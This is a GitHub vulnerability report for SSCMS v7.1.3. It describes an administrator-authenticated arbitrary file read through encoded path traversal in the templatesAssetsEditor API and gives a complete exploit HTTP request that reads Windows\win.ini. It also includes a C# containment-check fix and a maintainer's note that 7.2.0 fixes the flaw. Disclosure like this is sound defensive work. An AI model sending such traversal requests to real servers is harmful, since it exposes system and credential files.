
background file reading #3491

Open
nolan124 opened this issue Oct 24, 2022 · 2 comments

@nolan124

Vulnerability conditions
SSCMS v7.1.3 + MySQL + administrator privileges

Vulnerability details

1. Code analysis found that the interface /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName= has an arbitrary file read vulnerability.
   Code analysis process: \SSCMS.Web\Controllers\Admin\Cms\Templates\TemplatesAssetsEditorController.Get.cs
   Stepping in, the FileName parameter is found to be controllable and is passed into the ReadTextAsync method without any filtering.

[image]

The entry method was found to read out the file content directly, resulting in a file read vulnerability.
[image]

Vulnerability verification
After logging in to the background to obtain administrator credentials, the exp packet is as follows:

```http
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1
Host: 192.168.3.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826
Accept-Encoding: gzip
```

[image]
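The page does not show the 7.2.0 fix itself. As an added example (not SSCMS project code), the C# helper below shows how a controller can confine the user-supplied directoryPath and fileName to the site's template assets directory before reading, so a traversal like the one above is rejected; SafeAssetReader, ResolveInside, assetsRoot and ReadAssetAsync are assumed names, and OperatingSystem.IsWindows() requires .NET 5 or later.

```csharp
using System;
using System.IO;
using System.Threading.Tasks;

// Added example, not SSCMS code: reject any fileName/directoryPath whose
// canonical path escapes the assets root. Names here are assumptions.
public static class SafeAssetReader
{
    // Returns the canonical absolute path if it lies inside assetsRoot, else null.
    public static string ResolveInside(string assetsRoot, string directoryPath, string fileName)
    {
        if (string.IsNullOrWhiteSpace(fileName)) return null;

        // fileName must be a bare name: no separators, no ".." segments, no drive or
        // UNC prefix, no characters the OS forbids in file names.
        if (fileName != Path.GetFileName(fileName) || Path.IsPathRooted(fileName)) return null;
        if (fileName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0) return null;

        // Canonical root with a trailing separator, so "assets2" is not treated
        // as being inside "assets".
        string root = Path.GetFullPath(assetsRoot);
        if (!root.EndsWith(Path.DirectorySeparatorChar)) root += Path.DirectorySeparatorChar;

        // Path.Combine discards earlier parts if directoryPath is rooted, and
        // GetFullPath collapses "." and ".." segments; the containment check
        // afterwards is what actually decides, so both cases are caught.
        string candidate = Path.GetFullPath(Path.Combine(root, directoryPath ?? string.Empty, fileName));

        StringComparison cmp = OperatingSystem.IsWindows()
            ? StringComparison.OrdinalIgnoreCase   // NTFS paths are case-insensitive
            : StringComparison.Ordinal;
        return candidate.StartsWith(root, cmp) ? candidate : null;
    }

    // Replacement for an unfiltered ReadTextAsync(fileName): read only after
    // the path has been proven to stay under the assets root.
    public static async Task<string> ReadAssetAsync(string assetsRoot, string directoryPath, string fileName)
    {
        string path = ResolveInside(assetsRoot, directoryPath, fileName);
        if (path == null)
            throw new UnauthorizedAccessException("file name resolves outside the assets directory");
        return await File.ReadAllTextAsync(path);
    }
}
```

With this check, a fileName of `..\..\Windows\win.ini` fails the bare-name test on Windows, and a rooted directoryPath fails the containment test, while a legitimate `index.html` under the assets directory still resolves.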

@starlying
Contributor

Fixed at 7.2.0, Thanks

@nolan124
Author

Found by Chaitin Security Research Lab
